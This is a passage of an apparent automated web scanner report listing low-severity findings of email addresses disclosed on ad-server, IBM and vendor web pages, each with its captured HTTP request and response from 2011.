The following email address was disclosed in the response:

Request

GET /vast/adserver?sid=1834360&url=http%3A//widget.newsinc.com/_fw/bostonherald/toppicks_bostonherald_top.html HTTP/1.1
Host: vads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://adunit.cdn.auditude.com/flash/modules/display/AuditudeDisplayView.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168296542x0.096+1314892454x-365710891"; untarget=1; b="%3A%3A13beg"; geo="1%3AJY5LDoIwEEDv0q2ftPQ77IwXMEEPgOUTEwEDVQOEuzszbl5eX9tpV%2FFRIl%2FF8niJXIBVUu2ImumY4YBUXJQl19w1dw3khm%2BZQLSSuuPiDNFLZkbd8xzgM8C74MRepAWfvxRX1Gro0KehSc9yrsdjxDXWrsQapEfvv2mm76LG4Y1yK6jW6d%2FGtkc5n1CnR4sqwcfgG7hLaKLX1sVQZSBdU1daW6PFtv0A"; vsd=0@1@4e73f11b@widget.newsinc.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Set-Cookie: vsd=0@6d@4e73f415@widget.newsinc.com; path=/; domain=.adbrite.com; expires=Mon, 19-Sep-2011 01:12:53 GMT
Content-Type: application/xml
Connection: close
Server: XPEHb/1.0
Accept-Ranges: none
Date: Sat, 17 Sep 2011 01:12:53 GMT
Content-Length: 62

<?xml version="1.0" encoding="UTF-8"?>
<VAST version="2.0" />

20.20. http://vads.adbrite.com/vast/adserver  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vads.adbrite.com
Path:   /vast/adserver

Issue detail

The following email address was disclosed in the response:

Request

GET /vast/adserver?sid=1834360&url=http%3A//widget.newsinc.com/toppicks_bostonherald_ent.html HTTP/1.1
Host: vads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://adunit.cdn.auditude.com/flash/modules/display/AuditudeDisplayView.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168296542x0.096+1314892454x-365710891"; untarget=1; b="%3A%3A13beg"; geo="1%3AJY5LDoIwEEDv0q2ftPQ77IwXMEEPgOUTEwEDVQOEuzszbl5eX9tpV%2FFRIl%2FF8niJXIBVUu2ImumY4YBUXJQl19w1dw3khm%2BZQLSSuuPiDNFLZkbd8xzgM8C74MRepAWfvxRX1Gro0KehSc9yrsdjxDXWrsQapEfvv2mm76LG4Y1yK6jW6d%2FGtkc5n1CnR4sqwcfgG7hLaKLX1sVQZSBdU1daW6PFtv0A"; vsd=0@3@4e73f151@widget.newsinc.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Set-Cookie: vsd=0@4@4e73f1b9@widget.newsinc.com; path=/; domain=.adbrite.com; expires=Mon, 19-Sep-2011 01:02:49 GMT
Content-Type: application/xml
Connection: close
Server: XPEHb/1.0
Accept-Ranges: none
Date: Sat, 17 Sep 2011 01:02:49 GMT
Content-Length: 62

<?xml version="1.0" encoding="UTF-8"?>
<VAST version="2.0" />

20.21. http://vads.adbrite.com/vast/adserver  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vads.adbrite.com
Path:   /vast/adserver

Issue detail

The following email address was disclosed in the response:

Request

GET /vast/adserver?sid=1834360&url=http%3A//widget.newsinc.com/toppicks_bostonherald_ent.html HTTP/1.1
Host: vads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://adunit.cdn.auditude.com/flash/modules/display/AuditudeDisplayView.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168296542x0.096+1314892454x-365710891"; untarget=1; b="%3A%3A13beg"; geo="1%3AJY5LDoIwEEDv0q2ftPQ77IwXMEEPgOUTEwEDVQOEuzszbl5eX9tpV%2FFRIl%2FF8niJXIBVUu2ImumY4YBUXJQl19w1dw3khm%2BZQLSSuuPiDNFLZkbd8xzgM8C74MRepAWfvxRX1Gro0KehSc9yrsdjxDXWrsQapEfvv2mm76LG4Y1yK6jW6d%2FGtkc5n1CnR4sqwcfgG7hLaKLX1sVQZSBdU1daW6PFtv0A"; vsd=0@5@4e73f20a@widget.newsinc.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Set-Cookie: vsd=0@6@4e73f23f@widget.newsinc.com; path=/; domain=.adbrite.com; expires=Mon, 19-Sep-2011 01:05:03 GMT
Content-Type: application/xml
Connection: close
Server: XPEHb/1.0
Accept-Ranges: none
Date: Sat, 17 Sep 2011 01:05:03 GMT
Content-Length: 62

<?xml version="1.0" encoding="UTF-8"?>
<VAST version="2.0" />

20.22. http://vads.adbrite.com/vast/adserver  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vads.adbrite.com
Path:   /vast/adserver

Issue detail

The following email address was disclosed in the response:

Request

GET /vast/adserver?sid=1834360&url=http%3A//widget.newsinc.com/toppicks_bostonherald_ent.html HTTP/1.1
Host: vads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://adunit.cdn.auditude.com/flash/modules/display/AuditudeDisplayView.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168296542x0.096+1314892454x-365710891"; untarget=1; b="%3A%3A13beg"; geo="1%3AJY5LDoIwEEDv0q2ftPQ77IwXMEEPgOUTEwEDVQOEuzszbl5eX9tpV%2FFRIl%2FF8niJXIBVUu2ImumY4YBUXJQl19w1dw3khm%2BZQLSSuuPiDNFLZkbd8xzgM8C74MRepAWfvxRX1Gro0KehSc9yrsdjxDXWrsQapEfvv2mm76LG4Y1yK6jW6d%2FGtkc5n1CnR4sqwcfgG7hLaKLX1sVQZSBdU1daW6PFtv0A"; vsd=0@7@4e73f28a@widget.newsinc.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Set-Cookie: vsd=0@8@4e73f2b1@widget.newsinc.com; path=/; domain=.adbrite.com; expires=Mon, 19-Sep-2011 01:06:57 GMT
Content-Type: application/xml
Connection: close
Server: XPEHb/1.0
Accept-Ranges: none
Date: Sat, 17 Sep 2011 01:06:57 GMT
Content-Length: 62

<?xml version="1.0" encoding="UTF-8"?>
<VAST version="2.0" />

20.23. http://vads.adbrite.com/vast/adserver  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vads.adbrite.com
Path:   /vast/adserver

Issue detail

The following email address was disclosed in the response:

Request

GET /vast/adserver?sid=1834360&url=http%3A//widget.newsinc.com/_fw/bostonherald/toppicks_bostonherald_top.html HTTP/1.1
Host: vads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://adunit.cdn.auditude.com/flash/modules/display/AuditudeDisplayView.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168296542x0.096+1314892454x-365710891"; untarget=1; b="%3A%3A13beg"; geo="1%3AJY5LDoIwEEDv0q2ftPQ77IwXMEEPgOUTEwEDVQOEuzszbl5eX9tpV%2FFRIl%2FF8niJXIBVUu2ImumY4YBUXJQl19w1dw3khm%2BZQLSSuuPiDNFLZkbd8xzgM8C74MRepAWfvxRX1Gro0KehSc9yrsdjxDXWrsQapEfvv2mm76LG4Y1yK6jW6d%2FGtkc5n1CnR4sqwcfgG7hLaKLX1sVQZSBdU1daW6PFtv0A"; vsd=0@8@4e73f2b1@widget.newsinc.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Set-Cookie: vsd=0@9@4e73f2c9@widget.newsinc.com; path=/; domain=.adbrite.com; expires=Mon, 19-Sep-2011 01:07:21 GMT
Content-Type: application/xml
Connection: close
Server: XPEHb/1.0
Accept-Ranges: none
Date: Sat, 17 Sep 2011 01:07:21 GMT
Content-Length: 62

<?xml version="1.0" encoding="UTF-8"?>
<VAST version="2.0" />

20.24. http://vads.adbrite.com/vast/adserver  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vads.adbrite.com
Path:   /vast/adserver

Issue detail

The following email address was disclosed in the response:

Request

GET /vast/adserver?sid=1834360&url=http%3A//widget.newsinc.com/_fw/bostonherald/toppicks_bostonherald_top.html HTTP/1.1
Host: vads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://adunit.cdn.auditude.com/flash/modules/display/AuditudeDisplayView.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168296542x0.096+1314892454x-365710891"; untarget=1; b="%3A%3A13beg"; geo="1%3AJY5LDoIwEEDv0q2ftPQ77IwXMEEPgOUTEwEDVQOEuzszbl5eX9tpV%2FFRIl%2FF8niJXIBVUu2ImumY4YBUXJQl19w1dw3khm%2BZQLSSuuPiDNFLZkbd8xzgM8C74MRepAWfvxRX1Gro0KehSc9yrsdjxDXWrsQapEfvv2mm76LG4Y1yK6jW6d%2FGtkc5n1CnR4sqwcfgG7hLaKLX1sVQZSBdU1daW6PFtv0A"; vsd=0@2@4e73f12f@widget.newsinc.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Set-Cookie: vsd=0@3@4e73f151@widget.newsinc.com; path=/; domain=.adbrite.com; expires=Mon, 19-Sep-2011 01:01:05 GMT
Content-Type: application/xml
Connection: close
Server: XPEHb/1.0
Accept-Ranges: none
Date: Sat, 17 Sep 2011 01:01:05 GMT
Content-Length: 62

<?xml version="1.0" encoding="UTF-8"?>
<VAST version="2.0" />

20.25. http://vads.adbrite.com/vast/adserver  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vads.adbrite.com
Path:   /vast/adserver

Issue detail

The following email address was disclosed in the response:

Request

GET /vast/adserver?sid=1834360&url=http%3A//widget.newsinc.com/_fw/bostonherald/toppicks_bostonherald_top.html HTTP/1.1
Host: vads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://adunit.cdn.auditude.com/flash/modules/display/AuditudeDisplayView.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168296542x0.096+1314892454x-365710891"; untarget=1; b="%3A%3A13beg"; geo="1%3AJY5LDoIwEEDv0q2ftPQ77IwXMEEPgOUTEwEDVQOEuzszbl5eX9tpV%2FFRIl%2FF8niJXIBVUu2ImumY4YBUXJQl19w1dw3khm%2BZQLSSuuPiDNFLZkbd8xzgM8C74MRepAWfvxRX1Gro0KehSc9yrsdjxDXWrsQapEfvv2mm76LG4Y1yK6jW6d%2FGtkc5n1CnR4sqwcfgG7hLaKLX1sVQZSBdU1daW6PFtv0A"; vsd=0@4@4e73f1b9@widget.newsinc.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Set-Cookie: vsd=0@5@4e73f20a@widget.newsinc.com; path=/; domain=.adbrite.com; expires=Mon, 19-Sep-2011 01:04:10 GMT
Content-Type: application/xml
Connection: close
Server: XPEHb/1.0
Accept-Ranges: none
Date: Sat, 17 Sep 2011 01:04:10 GMT
Content-Length: 62

<?xml version="1.0" encoding="UTF-8"?>
<VAST version="2.0" />

20.26. http://vads.adbrite.com/vast/adserver  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vads.adbrite.com
Path:   /vast/adserver

Issue detail

The following email address was disclosed in the response:

Request

GET /vast/adserver?sid=1834360&url=http%3A//widget.newsinc.com/_fw/bostonherald/toppicks_bostonherald_top.html HTTP/1.1
Host: vads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://adunit.cdn.auditude.com/flash/modules/display/AuditudeDisplayView.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168296542x0.096+1314892454x-365710891"; untarget=1; b="%3A%3A13beg"; geo="1%3AJY5LDoIwEEDv0q2ftPQ77IwXMEEPgOUTEwEDVQOEuzszbl5eX9tpV%2FFRIl%2FF8niJXIBVUu2ImumY4YBUXJQl19w1dw3khm%2BZQLSSuuPiDNFLZkbd8xzgM8C74MRepAWfvxRX1Gro0KehSc9yrsdjxDXWrsQapEfvv2mm76LG4Y1yK6jW6d%2FGtkc5n1CnR4sqwcfgG7hLaKLX1sVQZSBdU1daW6PFtv0A"

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Set-Cookie: vsd=0@a@4e73f382@widget.newsinc.com; path=/; domain=.adbrite.com; expires=Mon, 19-Sep-2011 01:10:26 GMT
Content-Type: application/xml
Connection: close
Server: XPEHb/1.0
Accept-Ranges: none
Date: Sat, 17 Sep 2011 01:10:26 GMT
Content-Length: 62

<?xml version="1.0" encoding="UTF-8"?>
<VAST version="2.0" />

20.27. http://vads.adbrite.com/vast/adserver  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vads.adbrite.com
Path:   /vast/adserver

Issue detail

The following email address was disclosed in the response:

Request

GET /vast/adserver?sid=1834360&url=http%3A//widget.newsinc.com/toppicks_bostonherald_ent.html HTTP/1.1
Host: vads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://adunit.cdn.auditude.com/flash/modules/display/AuditudeDisplayView.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168296542x0.096+1314892454x-365710891"; untarget=1; b="%3A%3A13beg"; geo="1%3AJY5LDoIwEEDv0q2ftPQ77IwXMEEPgOUTEwEDVQOEuzszbl5eX9tpV%2FFRIl%2FF8niJXIBVUu2ImumY4YBUXJQl19w1dw3khm%2BZQLSSuuPiDNFLZkbd8xzgM8C74MRepAWfvxRX1Gro0KehSc9yrsdjxDXWrsQapEfvv2mm76LG4Y1yK6jW6d%2FGtkc5n1CnR4sqwcfgG7hLaKLX1sVQZSBdU1daW6PFtv0A"; vsd=0@6@4e73f23f@widget.newsinc.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Set-Cookie: vsd=0@7@4e73f28a@widget.newsinc.com; path=/; domain=.adbrite.com; expires=Mon, 19-Sep-2011 01:06:18 GMT
Content-Type: application/xml
Connection: close
Server: XPEHb/1.0
Accept-Ranges: none
Date: Sat, 17 Sep 2011 01:06:18 GMT
Content-Length: 62

<?xml version="1.0" encoding="UTF-8"?>
<VAST version="2.0" />

20.28. http://www-01.ibm.com/support/docview.wss  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www-01.ibm.com
Path:   /support/docview.wss

Issue detail

The following email address was disclosed in the response:

Request

GET /support/docview.wss?uid=swg27016186 HTTP/1.1
Host: www-01.ibm.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ibm.com/search/csass/search?q=faq+help+phone+xss&cc=us&en=utf&co=us&sn=mh&lang=en&lo=any&hpp=100
Cookie: ibmSurvey=1316220781236; pSite=http%3A//www-935.ibm.com/services/us/igs/smarterdatacenter.html%3Flnk%3Dmhse; UnicaNIODID=oNxUBOiFZhX-XKsQQhu; mbox=check#true#1316221073|session#1316221012167-554408#1316222873|PC#1316221012167-554408.19#1317430615

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:58:57 GMT
Server: IBM_HTTP_Server/6.1.0.29 Apache/2.0.47
Pragma: no-cache
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Expires: 17 09 2011 01:58:57 GMT
Last-Modified: Tue, 16 Aug 2011 14:20:44 GMT
Content-Type: text/html; charset=utf-8
Content-Language: en-US
Proxy-Connection: Keep-Alive
Connection: Keep-Alive
Content-Length: 127929


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<hea
...[SNIP]...
<meta name="Owner" content="ibmsupt@us.ibm.com"/>
...[SNIP]...

20.29. http://www-935.ibm.com/services/us/igs/smarterdatacenter.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www-935.ibm.com
Path:   /services/us/igs/smarterdatacenter.html

Issue detail

The following email address was disclosed in the response:

Request

GET /services/us/igs/smarterdatacenter.html?lnk=mhse HTTP/1.1
Host: www-935.ibm.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ibm.com/products/us/en/
Cookie: ibmSurvey=1316220781236; pSite=http%3A//www.ibm.com/developerworks/forums/thread.jspa%3FmessageID%3D14644760; UnicaNIODID=oNxUBOiFZhX-XKsQQhu; mbox=check#true#1316221073|session#1316221012167-554408#1316222873|PC#1316221012167-554408.19#1317430615

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:57:51 GMT
Server: IBM_HTTP_Server
Accept-Ranges: bytes
Content-Length: 28273
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<head>
   <meta
...[SNIP]...
<meta name="owner" content="kaibrown@us.ibm.com" />
...[SNIP]...

20.30. http://www.advancedvoip.com/pc_to_phone/pc_to_phone.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.advancedvoip.com
Path:   /pc_to_phone/pc_to_phone.html

Issue detail

The following email addresses were disclosed in the response:

Request

GET /pc_to_phone/pc_to_phone.html HTTP/1.1
Host: www.advancedvoip.com
Proxy-Connection: keep-alive
Referer: http://advancedvoip.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 33746
Content-Type: text/html
Last-Modified: Wed, 22 Jun 2011 23:04:12 GMT
Accept-Ranges: bytes
ETag: "e2b31db33031cc1:48f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 16 Sep 2011 19:47:35 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Temp
...[SNIP]...
<a href="mailto:sales@AdvancedVoIP.com">sales@AdvancedVoIP.com</a>
...[SNIP]...
<a href="mailto:sales@advancedvoip.com">
...[SNIP]...

20.31. http://www.alepo.com/javascript/validation.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.alepo.com
Path:   /javascript/validation.js

Issue detail

The following email address was disclosed in the response:

Request

GET /javascript/validation.js HTTP/1.1
Host: www.alepo.com
Proxy-Connection: keep-alive
Referer: http://www.alepo.com/radius-server.shtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:48:48 GMT
Server: Apache
Last-Modified: Tue, 03 May 2011 21:40:23 GMT
ETag: "4fa478-1e53-4a265fcc646e5"
Accept-Ranges: bytes
Content-Length: 7763
Content-Type: application/x-javascript

// Generic Form Validation
// Jacob Hage (jacob@hage.dk)
var checkObjects    = new Array();
var errors        = "";
var returnVal        = false;
var language        = new Array();
language["header"]    = "The following error(s) occured:"
language["start"]    = "->
...[SNIP]...

20.32. http://www.aradial.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aradial.com
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: www.aradial.com
Proxy-Connection: keep-alive
Referer: http://blekko.com/ws/radius+server
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:44:31 GMT
Server: Apache
Last-Modified: Wed, 02 Feb 2011 07:01:21 GMT
ETag: "fca81c5-4378-4d490141"
Accept-Ranges: bytes
Content-Length: 17272
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>

<head>
<TITLE>Radius Server software and AAA RADIUS billing systems - Aradial</TITLE>
<meta name="description" content="RADI
...[SNIP]...
<meta name="Author" content="info@aradial.com">
...[SNIP]...

20.33. http://www.aradial.com/aradial-radius-server-billing-corporate.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aradial.com
Path:   /aradial-radius-server-billing-corporate.html

Issue detail

The following email address was disclosed in the response:

Request

GET /aradial-radius-server-billing-corporate.html HTTP/1.1
Host: www.aradial.com
Proxy-Connection: keep-alive
Referer: http://www.aradial.com/aradial-radius-server-billing-customers.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=23544170.1980425115.1316220328.1316220328.1316220328.1; __utmb=23544170; __utmc=23544170; __utmz=23544170.1316220328.1.1.utmccn=(referral)|utmcsr=blekko.com|utmcct=/ws/radius+server|utmcmd=referral

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:46:10 GMT
Server: Apache
Last-Modified: Sun, 10 May 2009 13:49:52 GMT
ETag: "fca8488-2005-4a06db80"
Accept-Ranges: bytes
Content-Length: 8197
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>

<head>
<TITLE>Aradial Technolgies - Aradial Radius Server Corporate Profile</TITLE>
<meta name="description" content="Radius
...[SNIP]...
<meta name="Author" content="info@aradial.com">
...[SNIP]...

20.34. http://www.aradial.com/aradial-radius-server-billing-customers.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aradial.com
Path:   /aradial-radius-server-billing-customers.html

Issue detail

The following email address was disclosed in the response:

Request

GET /aradial-radius-server-billing-customers.html HTTP/1.1
Host: www.aradial.com
Proxy-Connection: keep-alive
Referer: http://www.aradial.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=23544170.1980425115.1316220328.1316220328.1316220328.1; __utmb=23544170; __utmc=23544170; __utmz=23544170.1316220328.1.1.utmccn=(referral)|utmcsr=blekko.com|utmcct=/ws/radius+server|utmcmd=referral

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:45:23 GMT
Server: Apache
Last-Modified: Sun, 10 May 2009 13:43:06 GMT
ETag: "fca8489-29a4-4a06d9ea"
Accept-Ranges: bytes
Content-Length: 10660
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>

<head>
<TITLE>Aradial Radius Server Customers</TITLE>
<meta name="description" content="Radius Server (AAA) and Billing Solu
...[SNIP]...
<meta name="Author" content="info@aradial.com">
...[SNIP]...

20.35. http://www.aradial.com/aradial-radius-server-billing-home-content.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aradial.com
Path:   /aradial-radius-server-billing-home-content.html

Issue detail

The following email address was disclosed in the response:

Request

GET /aradial-radius-server-billing-home-content.html HTTP/1.1
Host: www.aradial.com
Proxy-Connection: keep-alive
Referer: http://www.aradial.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:44:34 GMT
Server: Apache
Last-Modified: Mon, 09 May 2011 11:38:12 GMT
ETag: "fca848e-109e-4dc7d224"
Accept-Ranges: bytes
Content-Length: 4254
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>

<head>
<TITLE>Radius Server (AAA server), Diameter Server and Convergent Billing</TITLE>
<meta name="description" content="
...[SNIP]...
<meta name="Author" content="info@aradial.com">
...[SNIP]...

